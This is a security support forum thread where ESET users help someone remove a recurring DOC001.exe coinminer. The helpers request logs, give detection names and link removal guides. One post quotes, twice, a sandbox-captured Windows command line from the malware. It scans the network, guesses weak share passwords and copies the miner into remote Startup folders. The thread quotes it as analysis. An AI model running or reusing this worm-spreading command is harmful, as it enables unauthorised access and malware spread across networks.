Jump to content

Recommended Posts

Is that "DC002. Exe" a name of a file? Is it detected by ESET? If not, please submit it to ESET for analysis as per FAQ on the right-hand side of this forum.

Share this post


Link to post
Share on other sites

Have you also submitted logs as per the KB I referred to? Just knowing the file name doesn't tell anything.

Share this post


Link to post
Share on other sites

If the file is DOC001.exe, it is possible the .exe is a coinminer: https://malwaretips.com/blogs/remove-doc001-exe/ .

The first question is how did you know you were infected? Do you have Eset installed and it detected something? If so, there should be an entry or entries in Eset Detection log related to this detection. You need to copy those detection entries and post them in this thread so were can indentify the malware.

Share this post


Link to post
Share on other sites

So is it detected by ESET or not? If it is, under what name? If not, please submit it to samples[at]eset.com in an archive encrypted with the password "infected".

Share this post


Link to post
Share on other sites

The first question is how did you know you were infected? i saw on drive C of most computers has that folder. even you delete it , it will re- appear again. Do you have Eset installed and it detected something? I have Eset installed but its not detecting If so, there should be an entry or entries in Eset Detection log related to this detection. You need to copy those detection entries and post them in this thread so were can indentify the malware.

Share this post


Link to post
Share on other sites
Posted (edited)

Submit doc001.exe to VirusTotal: https://www.virustotal.com/#/home/upload and see what security solutions there detect it.  

1 hour ago, Gerald KAmande said:

https://malwaretips.com/blogs/remove-doc001-exe/ .  i have tried it detects but the virus will still hit on those pcs 

Are you stating MBAM detects and removes the malware but it reappears? If so, when does it reappear? After a system restart?

Also after MBAM detected the malware, did you do this?

Quote

When the scan has completed, you will be presented with a screen showing the malware infections that Malwarebytes has detected. To remove the malicious programs that Malwarebytes has found, click on the “Quarantine Selected” button.

 

Edited by itman

Share this post


Link to post
Share on other sites

There's a May 4, 2019 analysis of DOC001.exe at Malware-Analysis here: https://www.hybrid-analysis.com/sample/f23435192769e92a832e8eba0dd769fc50e23fb41f11cd647ea2c550520f2f68?environmentId=100 . AV detection of the malware is quite high. And it does maintain persistence in the various Win startup locations as noted below. Appears it is has loaded itself into every on of them!

Quote

icon_dummy.png cmd.exe /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=DOC001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "%APPDATA%\Temps\DOC001.exe" "\\!s!\%j\DOC001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\%USERNAME%\AppData\Roaming\Temps\DOC001.exe" %d) & net use %c /delete /y & ping -n 20 localhost))) (PID: 652) reduced_monitoring.png

icon_dummy.png cmd.exe /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=DOC001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "%APPDATA%\Temp\DOC001.exe" "\\!s!\%j\DOC001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\%USERNAME%\AppData\Roaming\Temp\DOC001.exe" %d) & net use %c /delete /y & ping -n 20 localhost))) (PID: 3880) reduced_monitoring.png

 

Share this post


Link to post
Share on other sites
19 hours ago, itman said:

Submit doc001.exe to VirusTotal: https://www.virustotal.com/#/home/upload and see what security solutions there detect it.  

Are you stating MBAM detects and removes the malware but it reappears? If so, when does it reappear? After a system restart?

Also after MBAM detected the malware, did you do this?

 

i have uploaded the file attached see theresults

image.thumb.png.955b5eec04aaeafe29a4715ab00c303e.png

Share this post


Link to post
Share on other sites

0b36728a48fbff17a45be400c628052e6dca95fc - NSIS/CoinMiner.T trojan
NsCpuCNMiner32.exe - a variant of Win32/CoinMiner.DQ potentially unwanted application
NsCpuCNMiner64.exe - a variant of Win64/CoinMiner.CZ potentially unwanted application

The first one is a NSIS archive, the detection was added in April 2018. The other 2 executables (PUAs) are inside the NSIS archive, the detection was added in July 2017.

Share this post


Link to post
Share on other sites
1 hour ago, Marcos said:

0b36728a48fbff17a45be400c628052e6dca95fc - NSIS/CoinMiner.T trojan

TrendMicro has an article on how to permanently remove this coinminer here: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm_coinminer.inj . It does require some manual cleaning activities. Click on the "Solution" section. Substitute the "scan with TrendMicro" with a full in-depth scan using Eset Smart Security. 

If the above is too technically advanced for you, contract your regional Eset support concern for assistance: https://www.eset.com/int/ 

Share this post


Link to post
Share on other sites
Posted (edited)

For reference, SANS has an article on a malware sample using the NSIS installer here: https://isc.sans.edu/forums/diary/Quick+analysis+of+malware+created+with+NSIS/23703/ .

I believe this particular coinminer malware was deployed via a self-executing SFX archive using something along this line: https://gist.github.com/xymopen/951ef3d5301af55efd82eb67af129066 .

Make sure Eset's PUA protection is always enabled and don't ignore the warnings generated from it. It is far easier to prevent malware/nuisance-ware from being installed than trying to remove it later. 

Edited by itman

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...